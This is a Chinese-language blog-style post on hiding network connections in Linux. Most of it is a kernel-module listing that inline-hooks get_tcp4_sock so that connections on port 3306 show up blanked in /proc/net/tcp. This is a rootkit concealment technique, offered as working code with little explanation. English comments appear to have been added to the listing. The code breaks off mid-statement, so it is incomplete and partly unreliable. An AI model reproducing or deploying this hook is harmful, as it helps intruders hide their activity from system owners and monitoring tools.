Linux下隐藏网络连接的另一种方法


直接inline hook住get_tcp4_sock这个函数就行了,只不过需要重新实现下get_tcp4_sock的功能,再做下过滤。比较简单,代码如下:

#include <linux/kernel.h>
#include <linux/init.h>
#include <linux/module.h>
#include <linux/version.h>
#include <linux/types.h>
#include <linux/string.h>
#include <linux/unistd.h>
#include <linux/fs.h>
#include <linux/kmod.h>
#include <linux/file.h>
#include <linux/sched.h>
#include <linux/mm.h>
#include <linux/slab.h>
#include <linux/spinlock.h>
#include <linux/socket.h>
#include <linux/net.h>
#include <linux/in.h>
#include <linux/skbuff.h>
#include <linux/ip.h>
#include <linux/tcp.h>
#include <net/sock.h>
#include <asm/uaccess.h>
#include <asm/unistd.h>
#include <asm/termbits.h>
#include <asm/ioctls.h>
#include <linux/icmp.h>
#include <linux/netdevice.h>
#include <linux/netfilter.h>
#include <linux/netfilter_ipv4.h>

/* Module metadata shown by modinfo; the "GPL" license tag also decides whether
 * the module may bind EXPORT_SYMBOL_GPL symbols and whether loading it taints
 * the kernel. */
MODULE_LICENSE("GPL");
MODULE_AUTHOR("wzt");

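/*
 * wnps_in_aton - parse a dotted-quad IPv4 string into a network-order __u32.
 * @str: NUL-terminated string such as "127.0.0.1"; may be NULL.
 *
 * Returns htonl() of the parsed host-order value, or 0 when @str is NULL.
 * Up to four octets are read, each terminated by '.', '\0' or '\n'; a string
 * with fewer octets leaves the remaining low-order bytes zero ("10.1" gives
 * 10.1.0.0). Octets are not range-checked and non-digit characters are not
 * rejected, which matches the kernel's own in_aton() in <linux/inet.h> —
 * this helper duplicates that function and could simply call it.
 *
 * The character literals ('\0', '.', '0') had been lost from the listing,
 * which left the comparisons empty and the function uncompilable.
 */
__u32 wnps_in_aton(const char *str)
{
        unsigned int l = 0;     /* host-order accumulator, 32 bits like htonl()'s argument */
        int i;

        if (str == NULL)
                return 0;

        for (i = 0; i < 4; i++) {
                l <<= 8;
                if (*str != '\0') {
                        unsigned int val = 0;

                        /* Accumulate decimal digits until the octet separator or end of input. */
                        while (*str != '\0' && *str != '.' && *str != '\n') {
                                val *= 10;
                                val += *str - '0';
                                str++;
                        }
                        l |= val;

                        /* Step over the separator so the next octet starts on its first digit. */
                        if (*str != '\0')
                                str++;
                }
        }

        return htonl(l);
}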

void new_get_tcp4_sock(struct sock *sk, struct seq_file *f, int i, int *len)
{
        int timer_active;
        unsigned long timer_expires;
        struct tcp_sock *tp = tcp_sk(sk);
        const struct inet_connection_sock *icsk = inet_csk(sk);
        struct inet_sock *inet = inet_sk(sk);
        __be32 dest = inet->daddr;
        __be32 src = inet->rcv_saddr;
        __u16 destp = ntohs(inet->dport);
        __u16 srcp = ntohs(inet->sport);

    printk("!! in new_get_tcp4_sock. ");

        if (icsk->icsk_pending == ICSK_TIME_RETRANS) {
                timer_active    = 1;
                timer_expires   = icsk->icsk_timeout;
        } else if (icsk->icsk_pending == ICSK_TIME_PROBE0) {
                timer_active    = 4;
                timer_expires   = icsk->icsk_timeout;
        } else if (timer_pending(&sk->sk_timer)) {
                timer_active    = 2;
                timer_expires   = sk->sk_timer.expires;
        } else {
                timer_active    = 0;
                timer_expires = jiffies;
        }

/*
    if (src == wnps_in_aton("127.0.0.1")) {
        printk("got 127.0.0.1");
        return ;
    }
*/
        if (srcp == 3306 || destp == 3306) {
                printk("got 3306! ");
        seq_printf(f, "%4d: %08X:%04X %08X:%04X %02X %08X:%08X %02X:%08lX "
                        "%08X %5d %8d %lu %d %p %lu %lu %u %u %d%n",
                0, 0, 0, 0, 0, 0,
                tp->write_seq - tp->snd_una,
                sk->sk_state == TCP_LISTEN ? sk->sk_ack_backlog :
                                             (tp->rcv_nxt - tp->copied_seq),
                timer_active,
                jiffies_to_clock_t(timer_expires - jiffies),
                icsk->icsk_retransmits,
                sock_i_uid(sk),
          &nb
